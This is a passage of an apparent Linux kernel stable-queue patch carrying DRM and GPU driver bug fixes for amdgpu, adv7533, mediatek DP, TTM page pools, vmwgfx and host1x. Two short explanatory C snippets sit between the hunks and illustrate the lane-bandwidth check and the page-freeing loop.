+-				likely(adev->firmware.load_type == AMDGPU_FW_LOAD_PSP)) {
+-			ret = smu->ppt_funcs->set_gfx_power_up_by_imu(smu);
+-			if (ret) {
+-				dev_err(adev->dev, "Failed to Enable gfx imu!\n");
+-				return ret;
+-			}
+-		}
+-
++		ret = smu_set_gfx_imu_enable(smu);
++		if (ret)
++			return ret;
+ 		smu_dpm_set_vcn_enable(smu, true);
+ 		smu_dpm_set_jpeg_enable(smu, true);
+ 		smu_set_gfx_cgpg(smu, true);
+@@ -1671,6 +1683,10 @@ static int smu_resume(void *handle)
+ 		return ret;
+ 	}
+ 
++	ret = smu_set_gfx_imu_enable(smu);
++	if (ret)
++		return ret;
++
+ 	smu_set_gfx_cgpg(smu, true);
+ 
+ 	smu->disable_uclk_switch = 0;
+diff --git a/drivers/gpu/drm/bridge/adv7511/adv7533.c b/drivers/gpu/drm/bridge/adv7511/adv7533.c
+index fdfeadcefe805..7e3e56441aedc 100644
+--- a/drivers/gpu/drm/bridge/adv7511/adv7533.c
++++ b/drivers/gpu/drm/bridge/adv7511/adv7533.c
+@@ -103,22 +103,19 @@ void adv7533_dsi_power_off(struct adv7511 *adv)
+ enum drm_mode_status adv7533_mode_valid(struct adv7511 *adv,
+ 					const struct drm_display_mode *mode)
+ {
+-	int lanes;
++	unsigned long max_lane_freq;
+ 	struct mipi_dsi_device *dsi = adv->dsi;
++	u8 bpp = mipi_dsi_pixel_format_to_bpp(dsi->format);
+ 
+-	if (mode->clock > 80000)
+-		lanes = 4;
+-	else
+-		lanes = 3;
+-
+-	/*
+-	 * TODO: add support for dynamic switching of lanes
+-	 * by using the bridge pre_enable() op . Till then filter
+-	 * out the modes which shall need different number of lanes
+-	 * than what was configured in the device tree.
+-	 */
+-	if (lanes != dsi->lanes)
+-		return MODE_BAD;
++	/* Check max clock for either 7533 or 7535 */
++	if (mode->clock > (adv->type == ADV7533 ? 80000 : 148500))
++		return MODE_CLOCK_HIGH;
++
++	/* Check max clock for each lane */
++	max_lane_freq = (adv->type == ADV7533 ? 800000 : 891000);
++
++	if (mode->clock * bpp > max_lane_freq * adv->num_dsi_lanes)
++		return MODE_CLOCK_HIGH;
+ 
+ 	return MODE_OK;
+ }
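The replacement check compares the required DSI bandwidth (pixel clock times bits per pixel) against the aggregate lane capacity (per-lane limit times lane count), using the 80000/148500 kHz clock caps and 800000/891000 kHz per-lane limits from the hunk. The arithmetic, as a stand-alone sketch with units in kHz as in struct drm_display_mode:

#include <stdio.h>

static int mode_fits(unsigned long pixclk_khz, unsigned int bpp,
		     unsigned int lanes, unsigned long max_lane_khz)
{
	/* Total bit rate needed vs. aggregate lane capacity. */
	return pixclk_khz * bpp <= max_lane_khz * lanes;
}

int main(void)
{
	/* 4k30 at 24bpp over 4 lanes at 891 MHz per lane:
	   297000 * 24 = 7128000 > 891000 * 4 = 3564000. */
	printf("%d\n", mode_fits(297000, 24, 4, 891000)); /* 0: too fast */
	/* 1080p60: 148500 * 24 = 3564000 == 891000 * 4 -> fits exactly. */
	printf("%d\n", mode_fits(148500, 24, 4, 891000)); /* 1 */
	return 0;
}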
+diff --git a/drivers/gpu/drm/drm_probe_helper.c b/drivers/gpu/drm/drm_probe_helper.c
+index bcd9611dabfd9..1a672747c83b8 100644
+--- a/drivers/gpu/drm/drm_probe_helper.c
++++ b/drivers/gpu/drm/drm_probe_helper.c
+@@ -556,8 +556,9 @@ retry:
+ 		 */
+ 		dev->mode_config.delayed_event = true;
+ 		if (dev->mode_config.poll_enabled)
+-			schedule_delayed_work(&dev->mode_config.output_poll_work,
+-					      0);
++			mod_delayed_work(system_wq,
++					 &dev->mode_config.output_poll_work,
++					 0);
+ 	}
+ 
+ 	/* Re-enable polling in case the global poll config changed. */
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 2d46dcf820a23..80eb4f92167cc 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -1090,7 +1090,7 @@ intel_get_crtc_new_encoder(const struct intel_atomic_state *state,
+ 		num_encoders++;
+ 	}
+ 
+-	drm_WARN(encoder->base.dev, num_encoders != 1,
++	drm_WARN(state->base.dev, num_encoders != 1,
+ 		 "%d encoders for pipe %c\n",
+ 		 num_encoders, pipe_name(master_crtc->pipe));
+ 
+diff --git a/drivers/gpu/drm/lima/lima_drv.c b/drivers/gpu/drm/lima/lima_drv.c
+index 7b8d7178d09aa..39cab4a55f572 100644
+--- a/drivers/gpu/drm/lima/lima_drv.c
++++ b/drivers/gpu/drm/lima/lima_drv.c
+@@ -392,8 +392,10 @@ static int lima_pdev_probe(struct platform_device *pdev)
+ 
+ 	/* Allocate and initialize the DRM device. */
+ 	ddev = drm_dev_alloc(&lima_drm_driver, &pdev->dev);
+-	if (IS_ERR(ddev))
+-		return PTR_ERR(ddev);
++	if (IS_ERR(ddev)) {
++		err = PTR_ERR(ddev);
++		goto err_out0;
++	}
+ 
+ 	ddev->dev_private = ldev;
+ 	ldev->ddev = ddev;
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 9d085c05c49c3..007af69e5026f 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -806,10 +806,9 @@ static int mtk_dp_aux_wait_for_completion(struct mtk_dp *mtk_dp, bool is_read)
+ }
+ 
+ static int mtk_dp_aux_do_transfer(struct mtk_dp *mtk_dp, bool is_read, u8 cmd,
+-				  u32 addr, u8 *buf, size_t length)
++				  u32 addr, u8 *buf, size_t length, u8 *reply_cmd)
+ {
+ 	int ret;
+-	u32 reply_cmd;
+ 
+ 	if (is_read && (length > DP_AUX_MAX_PAYLOAD_BYTES ||
+ 			(cmd == DP_AUX_NATIVE_READ && !length)))
+@@ -841,10 +840,10 @@ static int mtk_dp_aux_do_transfer(struct mtk_dp *mtk_dp, bool is_read, u8 cmd,
+ 	/* Wait for feedback from sink device. */
+ 	ret = mtk_dp_aux_wait_for_completion(mtk_dp, is_read);
+ 
+-	reply_cmd = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3624) &
+-		    AUX_RX_REPLY_COMMAND_AUX_TX_P0_MASK;
++	*reply_cmd = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3624) &
++		     AUX_RX_REPLY_COMMAND_AUX_TX_P0_MASK;
+ 
+-	if (ret || reply_cmd) {
++	if (ret) {
+ 		u32 phy_status = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3628) &
+ 				 AUX_RX_PHY_STATE_AUX_TX_P0_MASK;
+ 		if (phy_status != AUX_RX_PHY_STATE_AUX_TX_P0_RX_IDLE) {
+@@ -1823,7 +1822,8 @@ static irqreturn_t mtk_dp_hpd_event_thread(int hpd, void *dev)
+ 	spin_unlock_irqrestore(&mtk_dp->irq_thread_lock, flags);
+ 
+ 	if (status & MTK_DP_THREAD_CABLE_STATE_CHG) {
+-		drm_helper_hpd_irq_event(mtk_dp->bridge.dev);
++		if (mtk_dp->bridge.dev)
++			drm_helper_hpd_irq_event(mtk_dp->bridge.dev);
+ 
+ 		if (!mtk_dp->train_info.cable_plugged_in) {
+ 			mtk_dp_disable_sdp_aui(mtk_dp);
+@@ -2070,7 +2070,7 @@ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 		ret = mtk_dp_aux_do_transfer(mtk_dp, is_read, request,
+ 					     msg->address + accessed_bytes,
+ 					     msg->buffer + accessed_bytes,
+-					     to_access);
++					     to_access, &msg->reply);
+ 
+ 		if (ret) {
+ 			drm_info(mtk_dp->drm_dev,
+@@ -2080,7 +2080,6 @@ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 		accessed_bytes += to_access;
+ 	} while (accessed_bytes < msg->size);
+ 
+-	msg->reply = DP_AUX_NATIVE_REPLY_ACK | DP_AUX_I2C_REPLY_ACK;
+ 	return msg->size;
+ err:
+ 	msg->reply = DP_AUX_NATIVE_REPLY_NACK | DP_AUX_I2C_REPLY_NACK;
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 047c5e8c87ff4..f21f1bb7f886d 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -1743,6 +1743,7 @@ struct msm_gpu *a5xx_gpu_init(struct drm_device *dev)
+ 	struct a5xx_gpu *a5xx_gpu = NULL;
+ 	struct adreno_gpu *adreno_gpu;
+ 	struct msm_gpu *gpu;
++	unsigned int nr_rings;
+ 	int ret;
+ 
+ 	if (!pdev) {
+@@ -1763,7 +1764,12 @@ struct msm_gpu *a5xx_gpu_init(struct drm_device *dev)
+ 
+ 	check_speed_bin(&pdev->dev);
+ 
+-	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, 4);
++	nr_rings = 4;
++
++	if (adreno_is_a510(adreno_gpu))
++		nr_rings = 1;
++
++	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, nr_rings);
+ 	if (ret) {
+ 		a5xx_destroy(&(a5xx_gpu->base.base));
+ 		return ERR_PTR(ret);
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_device.c b/drivers/gpu/drm/msm/adreno/adreno_device.c
+index c5c4c93b3689c..cd009d56d35d5 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_device.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_device.c
+@@ -438,9 +438,6 @@ struct msm_gpu *adreno_load_gpu(struct drm_device *dev)
+ 	 */
+ 	pm_runtime_enable(&pdev->dev);
+ 
+-	/* Make sure pm runtime is active and reset any previous errors */
+-	pm_runtime_set_active(&pdev->dev);
+-
+ 	ret = pm_runtime_get_sync(&pdev->dev);
+ 	if (ret < 0) {
+ 		pm_runtime_put_sync(&pdev->dev);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index 9c6817b5a1943..547f9f2b9fcb5 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -654,7 +654,7 @@ static int dpu_encoder_virt_atomic_check(
+ 		if (drm_atomic_crtc_needs_modeset(crtc_state)) {
+ 			dpu_rm_release(global_state, drm_enc);
+ 
+-			if (!crtc_state->active_changed || crtc_state->active)
++			if (!crtc_state->active_changed || crtc_state->enable)
+ 				ret = dpu_rm_reserve(&dpu_kms->rm, global_state,
+ 						drm_enc, crtc_state, topology);
+ 		}
+diff --git a/drivers/gpu/drm/panel/panel-novatek-nt35950.c b/drivers/gpu/drm/panel/panel-novatek-nt35950.c
+index 3a844917da075..5d04957b1144f 100644
+--- a/drivers/gpu/drm/panel/panel-novatek-nt35950.c
++++ b/drivers/gpu/drm/panel/panel-novatek-nt35950.c
+@@ -593,8 +593,12 @@ static int nt35950_probe(struct mipi_dsi_device *dsi)
+ 		       DRM_MODE_CONNECTOR_DSI);
+ 
+ 	ret = drm_panel_of_backlight(&nt->panel);
+-	if (ret)
++	if (ret) {
++		if (num_dsis == 2)
++			mipi_dsi_device_unregister(nt->dsi[1]);
++
+ 		return dev_err_probe(dev, ret, "Failed to get backlight\n");
++	}
+ 
+ 	drm_panel_add(&nt->panel);
+ 
+@@ -610,6 +614,10 @@ static int nt35950_probe(struct mipi_dsi_device *dsi)
+ 
+ 		ret = mipi_dsi_attach(nt->dsi[i]);
+ 		if (ret < 0) {
++			/* If we fail to attach to either host, we're done */
++			if (num_dsis == 2)
++				mipi_dsi_device_unregister(nt->dsi[1]);
++
+ 			return dev_err_probe(dev, ret,
+ 					     "Cannot attach to DSI%d host.\n", i);
+ 		}
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_encoder.c b/drivers/gpu/drm/rcar-du/rcar_du_encoder.c
+index b1787be31e92c..7ecec7b04a8d0 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_encoder.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_encoder.c
+@@ -109,8 +109,8 @@ int rcar_du_encoder_init(struct rcar_du_device *rcdu,
+ 	renc = drmm_encoder_alloc(&rcdu->ddev, struct rcar_du_encoder, base,
+ 				  &rcar_du_encoder_funcs, DRM_MODE_ENCODER_NONE,
+ 				  NULL);
+-	if (!renc)
+-		return -ENOMEM;
++	if (IS_ERR(renc))
++		return PTR_ERR(renc);
+ 
+ 	renc->output = output;
+ 
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_gem.c b/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
+index 6edb7c52cb3dc..19b46c00dcbfd 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
+@@ -262,9 +262,6 @@ static int rockchip_drm_gem_object_mmap(struct drm_gem_object *obj,
+ 	else
+ 		ret = rockchip_drm_gem_object_mmap_dma(obj, vma);
+ 
+-	if (ret)
+-		drm_gem_vm_close(vma);
+-
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/ttm/ttm_pool.c b/drivers/gpu/drm/ttm/ttm_pool.c
+index 9f6764bf3b15d..86affe987a1cb 100644
+--- a/drivers/gpu/drm/ttm/ttm_pool.c
++++ b/drivers/gpu/drm/ttm/ttm_pool.c
+@@ -366,6 +366,43 @@ static int ttm_pool_page_allocated(struct ttm_pool *pool, unsigned int order,
+ 	return 0;
+ }
+ 
++/**
++ * ttm_pool_free_range() - Free a range of TTM pages
++ * @pool: The pool used for allocating.
++ * @tt: The struct ttm_tt holding the page pointers.
++ * @caching: The page caching mode used by the range.
++ * @start_page: index for first page to free.
++ * @end_page: index for last page to free + 1.
++ *
++ * During allocation the ttm_tt page-vector may be populated with ranges of
++ * pages with different attributes if allocation hit an error without being
++ * able to completely fulfill the allocation. This function can be used
++ * to free these individual ranges.
++ */
++static void ttm_pool_free_range(struct ttm_pool *pool, struct ttm_tt *tt,
++				enum ttm_caching caching,
++				pgoff_t start_page, pgoff_t end_page)
++{
++	struct page **pages = tt->pages;
++	unsigned int order;
++	pgoff_t i, nr;
++
++	for (i = start_page; i < end_page; i += nr, pages += nr) {
++		struct ttm_pool_type *pt = NULL;
++
++		order = ttm_pool_page_order(pool, *pages);
++		nr = (1UL << order);
++		if (tt->dma_address)
++			ttm_pool_unmap(pool, tt->dma_address[i], nr);
++
++		pt = ttm_pool_select_type(pool, caching, order);
++		if (pt)
++			ttm_pool_type_give(pt, *pages);
++		else
++			ttm_pool_free_page(pool, caching, order, *pages);
++	}
++}
++
+ /**
+  * ttm_pool_alloc - Fill a ttm_tt object
+  *
+@@ -381,12 +418,14 @@ static int ttm_pool_page_allocated(struct ttm_pool *pool, unsigned int order,
+ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 		   struct ttm_operation_ctx *ctx)
+ {
+-	unsigned long num_pages = tt->num_pages;
++	pgoff_t num_pages = tt->num_pages;
+ 	dma_addr_t *dma_addr = tt->dma_address;
+ 	struct page **caching = tt->pages;
+ 	struct page **pages = tt->pages;
++	enum ttm_caching page_caching;
+ 	gfp_t gfp_flags = GFP_USER;
+-	unsigned int i, order;
++	pgoff_t caching_divide;
++	unsigned int order;
+ 	struct page *p;
+ 	int r;
+ 
+@@ -409,6 +448,7 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 	     order = min_t(unsigned int, order, __fls(num_pages))) {
+ 		struct ttm_pool_type *pt;
+ 
++		page_caching = tt->caching;
+ 		pt = ttm_pool_select_type(pool, tt->caching, order);
+ 		p = pt ? ttm_pool_type_take(pt) : NULL;
+ 		if (p) {
+@@ -417,6 +457,7 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 			if (r)
+ 				goto error_free_page;
+ 
++			caching = pages;
+ 			do {
+ 				r = ttm_pool_page_allocated(pool, order, p,
+ 							    &dma_addr,
+@@ -425,14 +466,15 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 				if (r)
+ 					goto error_free_page;
+ 
++				caching = pages;
+ 				if (num_pages < (1 << order))
+ 					break;
+ 
+ 				p = ttm_pool_type_take(pt);
+ 			} while (p);
+-			caching = pages;
+ 		}
+ 
++		page_caching = ttm_cached;
+ 		while (num_pages >= (1 << order) &&
+ 		       (p = ttm_pool_alloc_page(pool, gfp_flags, order))) {
+ 
+@@ -441,6 +483,7 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 							   tt->caching);
+ 				if (r)
+ 					goto error_free_page;
++				caching = pages;
+ 			}
+ 			r = ttm_pool_page_allocated(pool, order, p, &dma_addr,
+ 						    &num_pages, &pages);
+@@ -467,15 +510,13 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 	return 0;
+ 
+ error_free_page:
+-	ttm_pool_free_page(pool, tt->caching, order, p);
++	ttm_pool_free_page(pool, page_caching, order, p);
+ 
+ error_free_all:
+ 	num_pages = tt->num_pages - num_pages;
+-	for (i = 0; i < num_pages; ) {
+-		order = ttm_pool_page_order(pool, tt->pages[i]);
+-		ttm_pool_free_page(pool, tt->caching, order, tt->pages[i]);
+-		i += 1 << order;
+-	}
++	caching_divide = caching - tt->pages;
++	ttm_pool_free_range(pool, tt, tt->caching, 0, caching_divide);
++	ttm_pool_free_range(pool, tt, ttm_cached, caching_divide, num_pages);
+ 
+ 	return r;
+ }
+@@ -491,27 +532,7 @@ EXPORT_SYMBOL(ttm_pool_alloc);
+  */
+ void ttm_pool_free(struct ttm_pool *pool, struct ttm_tt *tt)
+ {
+-	unsigned int i;
+-
+-	for (i = 0; i < tt->num_pages; ) {
+-		struct page *p = tt->pages[i];
+-		unsigned int order, num_pages;
+-		struct ttm_pool_type *pt;
+-
+-		order = ttm_pool_page_order(pool, p);
+-		num_pages = 1ULL << order;
+-		if (tt->dma_address)
+-			ttm_pool_unmap(pool, tt->dma_address[i], num_pages);
+-
+-		pt = ttm_pool_select_type(pool, tt->caching, order);
+-		if (pt)
+-			ttm_pool_type_give(pt, tt->pages[i]);
+-		else
+-			ttm_pool_free_page(pool, tt->caching, order,
+-					   tt->pages[i]);
+-
+-		i += num_pages;
+-	}
++	ttm_pool_free_range(pool, tt, tt->caching, 0, tt->num_pages);
+ 
+ 	while (atomic_long_read(&allocated_pages) > page_pool_size)
+ 		ttm_pool_shrink();
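ttm_pool_free_range() walks the page vector in power-of-two chunks, reading each chunk's size back from the page's allocation order, which is what lets one loop free ranges built from mixed orders. A small illustration of that order-based walk; the orders here are invented, the real code queries them via ttm_pool_page_order():

#include <stdio.h>

int main(void)
{
	/* Pretend pages[i] came from allocations of these orders. */
	unsigned int order_of[8] = { 2, 2, 2, 2, 1, 1, 0, 0 };
	unsigned int i, nr;

	for (i = 0; i < 8; i += nr) {
		nr = 1u << order_of[i];	/* pages covered by this chunk */
		printf("free pages [%u..%u) as one order-%u block\n",
		       i, i + nr, order_of[i]);
	}
	return 0;
}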
+diff --git a/drivers/gpu/drm/vgem/vgem_fence.c b/drivers/gpu/drm/vgem/vgem_fence.c
+index c2a879734d407..e157541783959 100644
+--- a/drivers/gpu/drm/vgem/vgem_fence.c
++++ b/drivers/gpu/drm/vgem/vgem_fence.c
+@@ -249,4 +249,5 @@ void vgem_fence_close(struct vgem_file *vfile)
+ {
+ 	idr_for_each(&vfile->fence_idr, __vgem_fence_idr_fini, vfile);
+ 	idr_destroy(&vfile->fence_idr);
++	mutex_destroy(&vfile->fence_mutex);
+ }
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index 445d619e1fdc8..9fec194cdbf16 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -1420,70 +1420,10 @@ static void vmw_framebuffer_bo_destroy(struct drm_framebuffer *framebuffer)
+ 	kfree(vfbd);
+ }
+ 
+-static int vmw_framebuffer_bo_dirty(struct drm_framebuffer *framebuffer,
+-				    struct drm_file *file_priv,
+-				    unsigned int flags, unsigned int color,
+-				    struct drm_clip_rect *clips,
+-				    unsigned int num_clips)
+-{
+-	struct vmw_private *dev_priv = vmw_priv(framebuffer->dev);
+-	struct vmw_framebuffer_bo *vfbd =
+-		vmw_framebuffer_to_vfbd(framebuffer);
+-	struct drm_clip_rect norect;
+-	int ret, increment = 1;
+-
+-	drm_modeset_lock_all(&dev_priv->drm);
+-
+-	if (!num_clips) {
+-		num_clips = 1;
+-		clips = &norect;
+-		norect.x1 = norect.y1 = 0;
+-		norect.x2 = framebuffer->width;
+-		norect.y2 = framebuffer->height;
+-	} else if (flags & DRM_MODE_FB_DIRTY_ANNOTATE_COPY) {
+-		num_clips /= 2;
+-		increment = 2;
+-	}
+-
+-	switch (dev_priv->active_display_unit) {
+-	case vmw_du_legacy:
+-		ret = vmw_kms_ldu_do_bo_dirty(dev_priv, &vfbd->base, 0, 0,
+-					      clips, num_clips, increment);
+-		break;
+-	default:
+-		ret = -EINVAL;
+-		WARN_ONCE(true, "Dirty called with invalid display system.\n");
+-		break;
+-	}
+-
+-	vmw_cmd_flush(dev_priv, false);
+-
+-	drm_modeset_unlock_all(&dev_priv->drm);
+-
+-	return ret;
+-}
+-
+-static int vmw_framebuffer_bo_dirty_ext(struct drm_framebuffer *framebuffer,
+-					struct drm_file *file_priv,
+-					unsigned int flags, unsigned int color,
+-					struct drm_clip_rect *clips,
+-					unsigned int num_clips)
+-{
+-	struct vmw_private *dev_priv = vmw_priv(framebuffer->dev);
+-
+-	if (dev_priv->active_display_unit == vmw_du_legacy &&
+-	    vmw_cmd_supported(dev_priv))
+-		return vmw_framebuffer_bo_dirty(framebuffer, file_priv, flags,
+-						color, clips, num_clips);
+-
+-	return drm_atomic_helper_dirtyfb(framebuffer, file_priv, flags, color,
+-					 clips, num_clips);
+-}
+-
+ static const struct drm_framebuffer_funcs vmw_framebuffer_bo_funcs = {
+ 	.create_handle = vmw_framebuffer_bo_create_handle,
+ 	.destroy = vmw_framebuffer_bo_destroy,
+-	.dirty = vmw_framebuffer_bo_dirty_ext,
++	.dirty = drm_atomic_helper_dirtyfb,
+ };
+ 
+ /*
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+index 4d6e7b555db79..83595325cc186 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+@@ -512,11 +512,6 @@ void vmw_du_connector_destroy_state(struct drm_connector *connector,
+  */
+ int vmw_kms_ldu_init_display(struct vmw_private *dev_priv);
+ int vmw_kms_ldu_close_display(struct vmw_private *dev_priv);
+-int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+-			    struct vmw_framebuffer *framebuffer,
+-			    unsigned int flags, unsigned int color,
+-			    struct drm_clip_rect *clips,
+-			    unsigned int num_clips, int increment);
+ int vmw_kms_update_proxy(struct vmw_resource *res,
+ 			 const struct drm_clip_rect *clips,
+ 			 unsigned num_clips,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c b/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
+index a56e5d0ca3c65..ac72c20715f32 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
+@@ -234,6 +234,7 @@ static const struct drm_crtc_funcs vmw_legacy_crtc_funcs = {
+ 	.atomic_duplicate_state = vmw_du_crtc_duplicate_state,
+ 	.atomic_destroy_state = vmw_du_crtc_destroy_state,
+ 	.set_config = drm_atomic_helper_set_config,
++	.page_flip = drm_atomic_helper_page_flip,
+ };
+ 
+ 
+@@ -273,6 +274,12 @@ static const struct
+ drm_connector_helper_funcs vmw_ldu_connector_helper_funcs = {
+ };
+ 
++static int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
++				   struct vmw_framebuffer *framebuffer,
++				   unsigned int flags, unsigned int color,
++				   struct drm_mode_rect *clips,
++				   unsigned int num_clips);
++
+ /*
+  * Legacy Display Plane Functions
+  */
+@@ -291,7 +298,6 @@ vmw_ldu_primary_plane_atomic_update(struct drm_plane *plane,
+ 	struct drm_framebuffer *fb;
+ 	struct drm_crtc *crtc = new_state->crtc ?: old_state->crtc;
+ 
+-
+ 	ldu = vmw_crtc_to_ldu(crtc);
+ 	dev_priv = vmw_priv(plane->dev);
+ 	fb       = new_state->fb;
+@@ -304,8 +310,31 @@ vmw_ldu_primary_plane_atomic_update(struct drm_plane *plane,
+ 		vmw_ldu_del_active(dev_priv, ldu);
+ 
+ 	vmw_ldu_commit_list(dev_priv);
+-}
+ 
++	if (vfb && vmw_cmd_supported(dev_priv)) {
++		struct drm_mode_rect fb_rect = {
++			.x1 = 0,
++			.y1 = 0,
++			.x2 = vfb->base.width,
++			.y2 = vfb->base.height
++		};
++		struct drm_mode_rect *damage_rects = drm_plane_get_damage_clips(new_state);
++		u32 rect_count = drm_plane_get_damage_clips_count(new_state);
++		int ret;
++
++		if (!damage_rects) {
++			damage_rects = &fb_rect;
++			rect_count = 1;
++		}
++
++		ret = vmw_kms_ldu_do_bo_dirty(dev_priv, vfb, 0, 0, damage_rects, rect_count);
++
++		drm_WARN_ONCE(plane->dev, ret,
++			"vmw_kms_ldu_do_bo_dirty failed with: ret=%d\n", ret);
++
++		vmw_cmd_flush(dev_priv, false);
++	}
++}
+ 
+ static const struct drm_plane_funcs vmw_ldu_plane_funcs = {
+ 	.update_plane = drm_atomic_helper_update_plane,
+@@ -536,11 +565,11 @@ int vmw_kms_ldu_close_display(struct vmw_private *dev_priv)
+ }
+ 
+ 
+-int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+-			    struct vmw_framebuffer *framebuffer,
+-			    unsigned int flags, unsigned int color,
+-			    struct drm_clip_rect *clips,
+-			    unsigned int num_clips, int increment)
++static int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
++				   struct vmw_framebuffer *framebuffer,
++				   unsigned int flags, unsigned int color,
++				   struct drm_mode_rect *clips,
++				   unsigned int num_clips)
+ {
+ 	size_t fifo_size;
+ 	int i;
+@@ -556,7 +585,7 @@ int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+ 		return -ENOMEM;
+ 
+ 	memset(cmd, 0, fifo_size);
+-	for (i = 0; i < num_clips; i++, clips += increment) {
++	for (i = 0; i < num_clips; i++, clips++) {
+ 		cmd[i].header = SVGA_CMD_UPDATE;
+ 		cmd[i].body.x = clips->x1;
+ 		cmd[i].body.y = clips->y1;
+diff --git a/drivers/gpu/host1x/context.c b/drivers/gpu/host1x/context.c
+index c8e7994c2c9cd..84b23d36bcef4 100644
+--- a/drivers/gpu/host1x/context.c
++++ b/drivers/gpu/host1x/context.c
+@@ -13,6 +13,11 @@
+ #include "context.h"
+ #include "dev.h"
+ 
++static void host1x_memory_context_release(struct device *dev)
++{
++	/* context device is freed in host1x_memory_context_list_free() */
++}
++
+ int host1x_memory_context_list_init(struct host1x *host1x)
+ {
+ 	struct host1x_memory_context_list *cdl = &host1x->context_list;
+@@ -53,28 +58,30 @@ int host1x_memory_context_list_init(struct host1x *host1x)
+ 		dev_set_name(&ctx->dev, "host1x-ctx.%d", i);
+ 		ctx->dev.bus = &host1x_context_device_bus_type;
+ 		ctx->dev.parent = host1x->dev;
++		ctx->dev.release = host1x_memory_context_release;
+ 
+ 		dma_set_max_seg_size(&ctx->dev, UINT_MAX);
+ 
+ 		err = device_add(&ctx->dev);
+ 		if (err) {
+ 			dev_err(host1x->dev, "could not add context device %d: %d\n", i, err);
+-			goto del_devices;
++			put_device(&ctx->dev);
++			goto unreg_devices;
+ 		}
+ 
+ 		err = of_dma_configure_id(&ctx->dev, node, true, &i);
+ 		if (err) {
+ 			dev_err(host1x->dev, "IOMMU configuration failed for context device %d: %d\n",
+ 				i, err);
+-			device_del(&ctx->dev);
+-			goto del_devices;
++			device_unregister(&ctx->dev);
++			goto unreg_devices;
+ 		}
+ 
+ 		fwspec = dev_iommu_fwspec_get(&ctx->dev);
+ 		if (!fwspec || !device_iommu_mapped(&ctx->dev)) {
+ 			dev_err(host1x->dev, "Context device %d has no IOMMU!\n", i);
+-			device_del(&ctx->dev);
+-			goto del_devices;
++			device_unregister(&ctx->dev);
++			goto unreg_devices;
+ 		}
+ 
+ 		ctx->stream_id = fwspec->ids[0] & 0xffff;
+@@ -82,11 +89,12 @@ int host1x_memory_context_list_init(struct host1x *host1x)
+ 
+ 	return 0;
+ 
+-del_devices:
++unreg_devices:
+ 	while (i--)
+-		device_del(&cdl->devs[i].dev);
++		device_unregister(&cdl->devs[i].dev);
+ 
+ 	kfree(cdl->devs);
++	cdl->devs = NULL;
+ 	cdl->len = 0;
+ 
+ 	return err;
+@@ -97,7 +105,7 @@ void host1x_memory_context_list_free(struct host1x_memory_context_list *cdl)
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < cdl->len; i++)
+-		device_del(&cdl->devs[i].dev);
++		device_unregister(&cdl->devs[i].dev);
+ 
+ 	kfree(cdl->devs);
+ 	cdl->len = 0;
